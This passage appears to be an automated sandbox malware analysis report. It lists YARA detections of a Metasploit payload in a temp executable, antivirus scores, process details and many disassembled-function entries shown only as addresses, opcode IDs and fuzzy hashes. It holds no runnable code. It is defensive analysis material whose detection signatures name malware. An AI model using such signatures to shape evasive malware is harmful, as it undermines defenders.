                • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe, Author: Joe Security
                • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe, Author: unknown
                • Rule: Windows_Trojan_Metasploit_91bc5d7d, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe, Author: unknown
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML

                General

                Target ID:11
                Start time:15:47:17
                Start date:11/07/2023
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7c72c0000
                File size:625'664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language

                Disassembly

                Reset < >

                  Executed Functions

                  Function 00007FF816251BE1 Relevance: 4.2, Strings: 3, Instructions: 472COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID: Zr9s$Zr9s$jt9s
                  • API String ID: 0-456592187
                  • Opcode ID: 227d7a536a950328269e7d78bd2f747bbec1f69ba9914c52e70b6c17b47a7407
                  • Instruction ID: 2ae9c66a31c1eddb75784f363ab298872e1ea4bd25bb56a5776badb99a369810
                  • Opcode Fuzzy Hash: 227d7a536a950328269e7d78bd2f747bbec1f69ba9914c52e70b6c17b47a7407
                  • Instruction Fuzzy Hash: B2D15F21B3CA860BF31DAA28984A2F577D1EF563A6F2442BDD4CBC75C7DD286C424351
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF816251C30 Relevance: 4.2, Strings: 3, Instructions: 411COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID: Zr9s$Zr9s$jt9s
                  • API String ID: 0-456592187
                  • Opcode ID: 783d665c5daafd9c319bf477522757da4f2779e855c38933d2c892da1d3bc272
                  • Instruction ID: 4a646b2674d94388969a069b870c72ce718ecd08afe73d48e48ad2db7e5d8930
                  • Opcode Fuzzy Hash: 783d665c5daafd9c319bf477522757da4f2779e855c38933d2c892da1d3bc272
                  • Instruction Fuzzy Hash: 0DC16E21B3C94A0BF31DAA2C984A2F576C2EF957A6F6442BDD4CBC76C7DD286C424241
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF816251050 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID: jt9s
                  • API String ID: 0-3786384843
                  • Opcode ID: 92a97ae303334e4ec7b339c0f068aa42c981be781b7dcef452c0797d95376971
                  • Instruction ID: faf9cfbc68b30417689c1ba70e95af20920d01f95731987b308d788292e40c62
                  • Opcode Fuzzy Hash: 92a97ae303334e4ec7b339c0f068aa42c981be781b7dcef452c0797d95376971
                  • Instruction Fuzzy Hash: 4871FA22F1CD494FF798F62C94597B877C2EFA93A1B1401BAD48EC7297DD28AC824351
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF81625102E Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID: jt9s
                  • API String ID: 0-3786384843
                  • Opcode ID: ded2214498e54ce8a0c03128bab6b3cba08e912c8fb288141dae8e8a5eb6e7e7
                  • Instruction ID: 539dac06b72c6088a5a85dd49dd885b17e8a9d9c2f33b37d6fff647a54d48231
                  • Opcode Fuzzy Hash: ded2214498e54ce8a0c03128bab6b3cba08e912c8fb288141dae8e8a5eb6e7e7
                  • Instruction Fuzzy Hash: 1E61F922B1CD494FE798FB2C94597B877C1EF993A1B1402BAD44EC7297DD28AC828351
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF8162506A9 Relevance: .8, Instructions: 844COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d541664adc25e46902c74448926f8c691ff0018ded17cda32e737c30650b3db0
                  • Instruction ID: 4e3123c057c25728b533a63d2cf04b3f1374ea6abebbaee4899c4116ff61d51e
                  • Opcode Fuzzy Hash: d541664adc25e46902c74448926f8c691ff0018ded17cda32e737c30650b3db0
                  • Instruction Fuzzy Hash: 64623E71E18A4D4FEB98EB28C851BF977A1EF59390F4001B5D44EDB692CD287C84CB62
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF816252029 Relevance: .6, Instructions: 644COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4dd9eca1d8abfe04b6de386c75bed3d411d42e16de8dc9ce4f49f0e61778d28d
                  • Instruction ID: 76ff779bb53d6c3e46e856d3fd0b1b1f0300c0448c1619af722a48c79265f1e5
                  • Opcode Fuzzy Hash: 4dd9eca1d8abfe04b6de386c75bed3d411d42e16de8dc9ce4f49f0e61778d28d
                  • Instruction Fuzzy Hash: 5A41C422B1DA890FEB56E73C98652F97BA1EF873A1B0801F7D489CB1E3CD185C458352
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF816251949 Relevance: .3, Instructions: 262COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 72678211359a30343e81e493082c7b10e7a57b371dd15cb8aa2ffca56e26b21c
                  • Instruction ID: 63ab2db289f36cf0f8c5bec567869bd5450c6e1cd1362263e05cecac5e0d358d
                  • Opcode Fuzzy Hash: 72678211359a30343e81e493082c7b10e7a57b371dd15cb8aa2ffca56e26b21c
                  • Instruction Fuzzy Hash: AB710421A1CD890FE796E72C44187B57BD1EF9A3A2B1501FAE08EC7293DD186C45C353
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF816251681 Relevance: .2, Instructions: 239COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8c7315e4daa7c9a659f5a8ea95e6d82aa5803984569db35d18774967fd8a9ffa
                  • Instruction ID: 1cffd6444948c13c7263570bd58ca3ab7f932c212f03b88f12bf793a99118901
                  • Opcode Fuzzy Hash: 8c7315e4daa7c9a659f5a8ea95e6d82aa5803984569db35d18774967fd8a9ffa
                  • Instruction Fuzzy Hash: 1F710631D18A498FDB54EB68C8556E8BBF1FF49360F1402BAD44DDB282CE386C42CB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF816251259 Relevance: .2, Instructions: 212COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e52b711c303e86809c390f607ce537fdc0786fe19ea759358e49cc1763ee8bc4
                  • Instruction ID: 38e15de196d617992f8b0e3a3b9705121681268e26f624e374362f9d4e30e0f2
                  • Opcode Fuzzy Hash: e52b711c303e86809c390f607ce537fdc0786fe19ea759358e49cc1763ee8bc4
                  • Instruction Fuzzy Hash: C9510712B2CE450FE758B73C846A3F9A6C2EF993E1B5401BAD44EC76D3DC286C814342
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF816251E80 Relevance: .2, Instructions: 183COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8313e351afa0d75fb56aec46eb01d75ca0c3fce46c503ea4c46eb29e660ba549
                  • Instruction ID: 5e818209494ce83b9677d32f87af09409197eabe418f5c001fc157e64247537f
                  • Opcode Fuzzy Hash: 8313e351afa0d75fb56aec46eb01d75ca0c3fce46c503ea4c46eb29e660ba549
                  • Instruction Fuzzy Hash: 1D51C412B2CE050FF74CB62C945A7B9B6C2DF597E1F5041BAE44EC76D3DC286C844262
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF816251489 Relevance: .2, Instructions: 155COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e42ccc3141e0390a9a1c735e1b56cb41793cef5f864d4d406c463c66ad348743
                  • Instruction ID: f334a23e67e05cc679fa5880dbb9b44e587df80ec4eef425d198929ec0b23319
                  • Opcode Fuzzy Hash: e42ccc3141e0390a9a1c735e1b56cb41793cef5f864d4d406c463c66ad348743
                  • Instruction Fuzzy Hash: 2E51D630A1DA8A4FDB55D73884187F9BBE1BF55361F1402BAD08ED72D3CE2C68458792
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF81625052D Relevance: .1, Instructions: 134COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e878545bf4caaea6425974c5435a7cee45b3da30c308a481ff6cf7bf5e6c8205
                  • Instruction ID: 3eb555bf9b1f2ef8279a00aafa40adf6a22f38349b3bc164fd4ebbc851acd57a
                  • Opcode Fuzzy Hash: e878545bf4caaea6425974c5435a7cee45b3da30c308a481ff6cf7bf5e6c8205
                  • Instruction Fuzzy Hash: FE415121E1DE460EFAA5AB2448217FC26919F963E0F5102B6D48FCB2D3DD2D3C48C756
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF81625265D Relevance: .1, Instructions: 69COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 654a58579bc12325fd8659d960f249a5122da40ef217ecfe739ad32d3eb9fd0e
                  • Instruction ID: 2834eeca1dc6a286281b033242e54f0fb24037bd64941d95effa6bacd8e9f328
                  • Opcode Fuzzy Hash: 654a58579bc12325fd8659d960f249a5122da40ef217ecfe739ad32d3eb9fd0e
                  • Instruction Fuzzy Hash: FC114C22D0DA8A0FE381E77848596F57BE1EF9B3A070941FAE04DC7193DD2C9C468712
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF8162515E8 Relevance: .0, Instructions: 30COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c4b0de8b275f4c2114f7d85e6f03fe820f187b9e0ac60a59f7c31d8d1b204772
                  • Instruction ID: cd439413ed60f51664f9616f5cb6177ef8ff067a05f7d3f0826acd889bcbc91b
                  • Opcode Fuzzy Hash: c4b0de8b275f4c2114f7d85e6f03fe820f187b9e0ac60a59f7c31d8d1b204772
                  • Instruction Fuzzy Hash: 44E02230C08B4D8FCB50EE98E408AE9BBA4FB8936AF1801AAD00DC20A2C2321884C741
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF8162526EF Relevance: .0, Instructions: 21COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2bbc3625ba139b01b62b03a0475d1f2e11083ee7b34b5cf1fb6e2fed1874ff31
                  • Instruction ID: a7343a6e16a09736ab4a3dc06624b22afef8972bca2c14dcfa50fc7d7ea41128
                  • Opcode Fuzzy Hash: 2bbc3625ba139b01b62b03a0475d1f2e11083ee7b34b5cf1fb6e2fed1874ff31
                  • Instruction Fuzzy Hash: F1D05E23B19C194ADB62A65CF0017FEF3C1DB883A5F0846BBD20EC3581CE65648647C1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF8162504E1 Relevance: .0, Instructions: 18COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d09eb17cea7e2ef254ae21c613752721cdc0e73fa53e6d38b2cbcb32cb7a1958
                  • Instruction ID: 67f1eeb555f8449f35958a1b257c2c7bc82851852a6387d11f44cf04dde8068d
                  • Opcode Fuzzy Hash: d09eb17cea7e2ef254ae21c613752721cdc0e73fa53e6d38b2cbcb32cb7a1958
                  • Instruction Fuzzy Hash: BCD02E3288CBCD0FCB02ABB00C010DA7F20EE02250F0803EBE499C3043CAAC82188383
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Executed Functions

                  Function 00007FF816241BE1 Relevance: 4.1, Strings: 3, Instructions: 321COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID: Zr9s$Zr9s$jt9s
                  • API String ID: 0-456592187
                  • Opcode ID: 975f6bf1faaec5898c1c4381e227e6b4fdf0a01eedacc91b5f4dd2e7976c2e99
                  • Instruction ID: 81242ac4c817c24658aed5e16afa34891d1606072f12305c36435b0071d04524
                  • Opcode Fuzzy Hash: 975f6bf1faaec5898c1c4381e227e6b4fdf0a01eedacc91b5f4dd2e7976c2e99
                  • Instruction Fuzzy Hash: DA917D25B79AC60BE31E9A7858492B13BD5EF8736BF2846BDC4C7C35C7D928A4434381
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF81624102E Relevance: 1.5, Strings: 1, Instructions: 263COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID: jt9s
                  • API String ID: 0-3786384843
                  • Opcode ID: ffe0b3eec556dbf67db07d70b8883733971a20e6d465a37d9c060cd903f6fd65
                  • Instruction ID: 39f9802a2bf70f626c0e42fbba7c4de1d265e13e1e560776354bfb49fa8e93fa
                  • Opcode Fuzzy Hash: ffe0b3eec556dbf67db07d70b8883733971a20e6d465a37d9c060cd903f6fd65
                  • Instruction Fuzzy Hash: C9612621B1DA490FE785FB7C445A779B7C1EF992A1B1402BED08EC3293DC2CAC828351
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF8162410D8 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID: jt9s
                  • API String ID: 0-3786384843
                  • Opcode ID: 19fa0ab0d926cc3707055278fd5136527e63eb3ceb0be277b5415cf052e50721
                  • Instruction ID: 4fa78d61f7837a769684ac9dcfb7598bfbeb6b8f4a70c05b9dd0b4284c1da65f
                  • Opcode Fuzzy Hash: 19fa0ab0d926cc3707055278fd5136527e63eb3ceb0be277b5415cf052e50721
                  • Instruction Fuzzy Hash: EE419222B28D494FE784FB6C449A77977C2EF9C7A1B14057ED08EC3297DD28AC824745
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF8162416B2 Relevance: .2, Instructions: 195COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 450fe86a4af1a19255a21ed45a513c69e942de354fc815a1e8377ed755a39574
                  • Instruction ID: 2d843a55406207b8bd39ecf823d06bc2a37fc0fd741f426d3a8d145a2c3c4fee
                  • Opcode Fuzzy Hash: 450fe86a4af1a19255a21ed45a513c69e942de354fc815a1e8377ed755a39574
                  • Instruction Fuzzy Hash: 3F61DF71919A498FDB45EB68C8566ECFBF0FF49360F1441BAD449D7292CE386842CB81
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF8162416C8 Relevance: .2, Instructions: 183COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3d77aeee614a5f2e09c6c946fdcede7d842f0b39c79702c9b7e6634d5e1a7ee5
                  • Instruction ID: 01a2c5b75e3dac6d13c01c67e2cb740f3ab46dfde527db13ffa92973db3c56ec
                  • Opcode Fuzzy Hash: 3d77aeee614a5f2e09c6c946fdcede7d842f0b39c79702c9b7e6634d5e1a7ee5
                  • Instruction Fuzzy Hash: 2551CF71A19A498FDB45EB68C8566ECFBF0FF49360F5042BAD44DD7292CE346842CB81
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF816241949 Relevance: .1, Instructions: 98COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eb99f22b5f754b4acf4d992027e8f73e9577e7d55656c171154b4df8699b94ad
                  • Instruction ID: 5c8552dd6893f0e30e50bb6473b61aef1fca2d8b291849eadf9267a63d97dc1d
                  • Opcode Fuzzy Hash: eb99f22b5f754b4acf4d992027e8f73e9577e7d55656c171154b4df8699b94ad
                  • Instruction Fuzzy Hash: B921E66595E6C56FD353A77458686B27FE8DF47272B1841EBE0C8C70A7D40D084AC353
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF816241B3D Relevance: .1, Instructions: 91COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6c4b9b43a8c92d69821b8dce1f4a67a0a4ecdbd9f6da364928777b4f30f921f0
                  • Instruction ID: eeb963d4e56c9cc39863aa4405fb623259aaee289e9702a29aa09189fbfd6bb2
                  • Opcode Fuzzy Hash: 6c4b9b43a8c92d69821b8dce1f4a67a0a4ecdbd9f6da364928777b4f30f921f0
                  • Instruction Fuzzy Hash: 1711D332A1891C4FAB40FB6CE84D9EABBE4FB5D375B00027BE81DD3161EA31A4518790
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF81624153A Relevance: .1, Instructions: 61COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d9eb0117cb1b375810d8aca3b9ed3689886afb16ecd496ebafb23b28151b1fe2
                  • Instruction ID: 58cefe60d7c8a05dd142f62f07863dcbfc07d09eb7baca2b6d1e2fb81b65e9da
                  • Opcode Fuzzy Hash: d9eb0117cb1b375810d8aca3b9ed3689886afb16ecd496ebafb23b28151b1fe2
                  • Instruction Fuzzy Hash: 7811D731B189098FDB84EB68C055BFDB7A2FF58351F600279D14EE7292DE39A881CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF8162412F7 Relevance: .1, Instructions: 54COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c6f2c8d4eb98e96d34d06c1538a75587eb319e405c27696468efc5e16637d0be
                  • Instruction ID: 904f7945f09a68f00ca30cba96426bc66a0fb6608ad4039bfe116f419c9b9c8a
                  • Opcode Fuzzy Hash: c6f2c8d4eb98e96d34d06c1538a75587eb319e405c27696468efc5e16637d0be
                  • Instruction Fuzzy Hash: 9401C411B29A464FE795FA3C48153B9A2C1AF987A1B4045BDC40EC36D3DC2DA8854741
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF8162413E3 Relevance: .0, Instructions: 45COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 335f3acb82a9297c79f63ae6d654e36ff8e9d934591864c673421a6ec2f6621a
                  • Instruction ID: d8101d52ea623499bdbff5d7a34153f831b4122a95b270ae2384f940ff720093
                  • Opcode Fuzzy Hash: 335f3acb82a9297c79f63ae6d654e36ff8e9d934591864c673421a6ec2f6621a
                  • Instruction Fuzzy Hash: 84F0FF23B2CA094BE708AB2CA4533F9E7C2EF893A0B5010BAD14EC32C3CD2968814241
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF81624052D Relevance: .0, Instructions: 39COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: adadef773b054f4985a8257fe567cca9eb53e878ac62704622bfb8ada85e10ff
                  • Instruction ID: f0e7198d04f29211f8d8699162f376bb4f4289f85c7a25725ae8673c602bcda1
                  • Opcode Fuzzy Hash: adadef773b054f4985a8257fe567cca9eb53e878ac62704622bfb8ada85e10ff
                  • Instruction Fuzzy Hash: 30F0687285EBC94FD7939F7448211D97F70EF46261F4A02E7D488CB493DA1C9944C752
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF816241AB5 Relevance: .0, Instructions: 30COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4c30b2b293a904d7ada8cad2aed65b213ee68702d056b21bf9960bd003461e00
                  • Instruction ID: a08922ca91368301fc31fdecaf36a3ed0a0e557c6cf78f9dfaea841a7a7ff7eb
                  • Opcode Fuzzy Hash: 4c30b2b293a904d7ada8cad2aed65b213ee68702d056b21bf9960bd003461e00
                  • Instruction Fuzzy Hash: ADE06D31729E094FE781F73D88257A8B2D6EF8835178140B9E40DC72A2DD6DDC828B02
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF8162415E8 Relevance: .0, Instructions: 30COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3b8cf2b9e1adcdfecd1366f8e80550bde8013258bb6755d79658fe0ff3b85ddf
                  • Instruction ID: a273d543d43654cf50925ca39022a77fcdb2509a8bd263e71ed083037c938536
                  • Opcode Fuzzy Hash: 3b8cf2b9e1adcdfecd1366f8e80550bde8013258bb6755d79658fe0ff3b85ddf
                  • Instruction Fuzzy Hash: 0CE02230D08B4C8FCB41EF58E408AE8BBA4FF8936AF1801AED00CC30A2C2325884C741
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF816240704 Relevance: .0, Instructions: 27COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1143904485dadc011f713d69fb7467c48c710404275930afa5e3f5515047dc10
                  • Instruction ID: a26a1e4e5517379b17e422597ef85b4a0115c7ccd471738ff67cc977cbc209c4
                  • Opcode Fuzzy Hash: 1143904485dadc011f713d69fb7467c48c710404275930afa5e3f5515047dc10
                  • Instruction Fuzzy Hash: EAF030306099499FDB81EB68C855E6D77E1FF5931074045A89009CB2A5CA28AC42CB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF8162414FC Relevance: .0, Instructions: 21COMMON
                  Download Yara Rule
                  Memory Dump Source
